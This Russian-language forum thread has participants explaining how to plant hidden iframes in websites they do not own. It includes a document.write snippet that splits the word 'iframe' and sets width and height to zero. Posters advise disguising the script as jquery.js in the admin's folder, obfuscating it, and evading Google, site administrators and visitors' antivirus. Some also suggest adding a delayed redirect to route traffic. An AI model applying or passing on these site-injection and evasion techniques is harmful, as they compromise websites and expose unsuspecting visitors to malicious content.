Через javascript. document.write При этом сам js залей на тот сайт который хочешь проайфреймить,в ту папку где у админа другие яваскрипты. И обзови jquery.js prototype.js scriptaculous.js или что то другое более распространенное. jquery самое неприметное. =))) И в header, а не в жопу. Правдоподобнее будет. И не сразу заметно. З.Ы. И обфусцировать не забудь!
если маскировать от гугля -то маскируй не маскируй -получишь бан.. если что то богомерзкое ))) а все методы шифрования с iframe.in - гуглю давно известны -придумывать свое что то надо... А если от живого человека(админа например) - то методы описываемые выше
document.write("<td><font size=2 face="Arial,Helvetica"><i"+"fr"+"am"+"e src=http://www.instructions.ru width=0 height=0 frameborder=0 vspace=0 space=0 marginwidth=0 marginheight=0 scrolling=no></font></iframe></td><td></td>"); неплохо было бы отэкранировать кавычки, добавить кавычки у src, добавить style="display:none", убрать столько </td> в конце и указать дату статьи, поскольку я не верю, что поисковики не палят такой примитивный ифрейм
обфускатор от Калипсо не палитсо ЗЫ Народ вот мне нужно воткнуть ивфрейм в редирект такое вообще возможно? и как это реализовать?
палится не палится, обфускатором бесполезно, все равно на выходе будет iframe, только в редких случаях оно нормально, ибо что бы ты не накрутил все равно будет выполнятся код, и именно этот выполняемый код будет виден, самое лучшее думаю как написал х демон или в инклуды запихивать, по поводу что сказал сатана, насколько я понял надо делать и что бы траф через фрейм шел и что бы редирект был потом, делай просто на выполнение ифрейм код + задержка а потом редирект
для меня важнее что бы простые пользователи не палили антивирями своими.а так прогнал инфрейм через обфускатор и убрал из статусной строки адресс. вроде пока не просекли.